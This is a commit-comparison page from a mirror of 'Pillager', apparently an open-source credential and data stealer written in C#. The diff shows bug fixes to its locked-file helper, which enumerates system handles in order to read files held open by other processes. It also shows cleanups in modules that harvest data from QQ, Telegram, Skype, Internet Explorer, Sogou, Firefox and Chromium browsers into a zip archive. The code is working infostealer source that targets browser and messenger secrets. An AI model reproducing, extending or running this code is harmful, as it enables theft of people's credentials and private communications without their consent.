qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: qwqdanchun:b1b4805075398217c40208eabab3cc1621bc76a5
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild
...
compare: qwqdanchun:8735f0a36de29834076bbcebdd75fbaa11884ead
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild

2 Commits
b1b4805075 ... 8735f0a36d

Author SHA1 Message Date
簞純 8735f0a36d Update LockedFile.cs 2023-10-25 23:10:18 +08:00
簞純 874ccd41a2 fix bug 2023-10-25 23:09:29 +08:00
7 changed files with 48 additions and 46 deletions
Show Stats Expand all files Collapse all files

1
Pillager/Browsers/IE.cs
View File

@ -3,7 +3,6 @@ using Pillager.Helper;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.IO; using System.IO;
using System.Net;
using System.Reflection; using System.Reflection;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.Text; using System.Text;

1
Pillager/Browsers/OldSogou.cs
View File

@ -1,6 +1,5 @@
using Pillager.Helper; using Pillager.Helper;
using System; using System;
using System.Collections.Generic;
using System.IO; using System.IO;
using System.Security.Cryptography; using System.Security.Cryptography;
using System.Text; using System.Text;

47
Pillager/Helper/LockedFile.cs
View File

@ -2,7 +2,6 @@
using System.Collections.Generic; using System.Collections.Generic;
using System.IO; using System.IO;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.Text;
namespace Pillager.Helper namespace Pillager.Helper
{ {
@ -48,9 +47,24 @@ namespace Pillager.Helper
Marshal.FreeHGlobal(ptrHandleData); Marshal.FreeHGlobal(ptrHandleData);
ptrHandleData = Marshal.AllocHGlobal(nLength); ptrHandleData = Marshal.AllocHGlobal(nLength);
} }
if (IntPtr.Size == 8)
{
int handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt32();
IntPtr ptrHandleItem = new IntPtr(ptrHandleData.ToInt64() + IntPtr.Size);
long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64(); for (long lIndex = 0; lIndex < handle_count; lIndex++)
IntPtr ptrHandleItem = new IntPtr(ptrHandleData.ToInt32() + Marshal.SizeOf(ptrHandleData)); {
Native.SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = new Native.SYSTEM_HANDLE_INFORMATION();
oSystemHandleInfo = (Native.SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ptrHandleItem, oSystemHandleInfo.GetType());
ptrHandleItem = new IntPtr(ptrHandleItem.ToInt64() + Marshal.SizeOf(oSystemHandleInfo.GetType()));
if (oSystemHandleInfo.ProcessID != pid) { continue; }
aHandles.Add(oSystemHandleInfo);
}
}
else
{
int handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt32();
IntPtr ptrHandleItem = new IntPtr(ptrHandleData.ToInt32() + IntPtr.Size);
for (long lIndex = 0; lIndex < handle_count; lIndex++) for (long lIndex = 0; lIndex < handle_count; lIndex++)
{ {
@ -61,6 +75,7 @@ namespace Pillager.Helper
aHandles.Add(oSystemHandleInfo); aHandles.Add(oSystemHandleInfo);
} }
} }
}
catch (Exception ex) catch (Exception ex)
{ {
throw ex; throw ex;
@ -75,11 +90,15 @@ namespace Pillager.Helper
private static string TryGetName(IntPtr Handle) private static string TryGetName(IntPtr Handle)
{ {
Native.IO_STATUS_BLOCK status = new Native.IO_STATUS_BLOCK(); Native.IO_STATUS_BLOCK status = new Native.IO_STATUS_BLOCK();
uint bufferSize = 32 * 1024; uint bufferSize = 1024;
var bufferPtr = Marshal.AllocHGlobal((int)bufferSize); var bufferPtr = Marshal.AllocHGlobal((int)bufferSize);
Native.NtQueryInformationFile(Handle, ref status, bufferPtr, bufferSize, Native.FILE_INFORMATION_CLASS.FileNameInformation); Native.NtQueryInformationFile(Handle, ref status, bufferPtr, bufferSize, Native.FILE_INFORMATION_CLASS.FileNameInformation);
var nameInfo = (Native.FileNameInformation)Marshal.PtrToStructure(bufferPtr, typeof(Native.FileNameInformation)); var nameInfo = (Native.FileNameInformation)Marshal.PtrToStructure(bufferPtr, typeof(Native.FileNameInformation));
return Marshal.PtrToStringUni(new IntPtr(bufferPtr.ToInt32() + 4), nameInfo.NameLength / 2); if (nameInfo.NameLength > bufferSize || nameInfo.NameLength <= 0)
{
return null;
}
return Marshal.PtrToStringUni(new IntPtr((IntPtr.Size == 8 ? bufferPtr.ToInt64() : bufferPtr.ToInt32()) + 4), nameInfo.NameLength / 2);
} }
public static IntPtr FindHandleByFileName(Native.SYSTEM_HANDLE_INFORMATION systemHandleInformation, string filename, IntPtr processHandle) public static IntPtr FindHandleByFileName(Native.SYSTEM_HANDLE_INFORMATION systemHandleInformation, string filename, IntPtr processHandle)
@ -116,10 +135,8 @@ namespace Pillager.Helper
Marshal.FreeHGlobal(objectTypeInfo); Marshal.FreeHGlobal(objectTypeInfo);
} }
} }
catch (Exception ex) catch { }
{
Console.WriteLine(ex.Message);
}
return IntPtr.Zero; return IntPtr.Zero;
} }
@ -127,7 +144,6 @@ namespace Pillager.Helper
{ {
IntPtr handle = IntPtr.Zero; IntPtr handle = IntPtr.Zero;
List<Native.SYSTEM_HANDLE_INFORMATION> syshInfos = GetHandles(pid); List<Native.SYSTEM_HANDLE_INFORMATION> syshInfos = GetHandles(pid);
IntPtr processHandle = GetProcessHandle(pid); IntPtr processHandle = GetProcessHandle(pid);
for (int i = 0; i < syshInfos.Count; i++) for (int i = 0; i < syshInfos.Count; i++)
@ -176,12 +192,17 @@ namespace Pillager.Helper
IntPtr readBuffer = bufferPtr; IntPtr readBuffer = bufferPtr;
int numEntries = Marshal.ReadInt32(readBuffer); // NumberOfProcessIdsInList int numEntries = Marshal.ReadInt32(readBuffer); // NumberOfProcessIdsInList
if (IntPtr.Size == 8)
readBuffer = new IntPtr(readBuffer.ToInt64() + IntPtr.Size);
else
readBuffer = new IntPtr(readBuffer.ToInt32() + IntPtr.Size); readBuffer = new IntPtr(readBuffer.ToInt32() + IntPtr.Size);
for (int i = 0; i < numEntries; i++) for (int i = 0; i < numEntries; i++)
{ {
int processId = Marshal.ReadIntPtr(readBuffer).ToInt32(); // A single ProcessIdList[] element IntPtr processId = Marshal.ReadIntPtr(readBuffer); // A single ProcessIdList[] element
result.Add(processId); result.Add(processId.ToInt32());
if (IntPtr.Size == 8)
readBuffer = new IntPtr(readBuffer.ToInt64() + IntPtr.Size);
else
readBuffer = new IntPtr(readBuffer.ToInt32() + IntPtr.Size); readBuffer = new IntPtr(readBuffer.ToInt32() + IntPtr.Size);
} }
} }

2
Pillager/IM/QQ.cs
View File

@ -1,7 +1,5 @@
using System; using System;
using System.Collections.Generic;
using System.IO; using System.IO;
using System.Linq;
using System.Net; using System.Net;
using System.Text; using System.Text;

3
Pillager/IM/Skype.cs
View File

@ -1,9 +1,6 @@
using Pillager.Helper; using Pillager.Helper;
using System; using System;
using System.Collections.Generic;
using System.IO; using System.IO;
using System.Linq;
using System.Net;
using System.Text; using System.Text;
namespace Pillager.IM namespace Pillager.IM

7
Pillager/IM/Telegram.cs
View File

@ -1,10 +1,5 @@
using Pillager.Helper; using System;
using System;
using System.Collections.Generic;
using System.IO; using System.IO;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
namespace Pillager.IM namespace Pillager.IM
{ {

13
Pillager/Program.cs
View File

@ -17,22 +17,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath); if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath); Directory.CreateDirectory(savepath);
//IM
QQ.Save(savepath); QQ.Save(savepath);
Telegram.Save(savepath); Telegram.Save(savepath);
Skype.Save(savepath); Skype.Save(savepath);
//IE //Browser
IE.Save(savepath); IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
//SogouExplorer < 12.x
OldSogou.Save(savepath);
//FireFox
FireFox.Save(savepath); FireFox.Save(savepath);
//Chrome
List<List<string>> browserOnChromium = new List<List<string>>() List<List<string>> browserOnChromium = new List<List<string>>()
{ {
new List<string>() { "Chrome", "Google\\Chrome\\User Data\\Default" } , new List<string>() { "Chrome", "Google\\Chrome\\User Data\\Default" } ,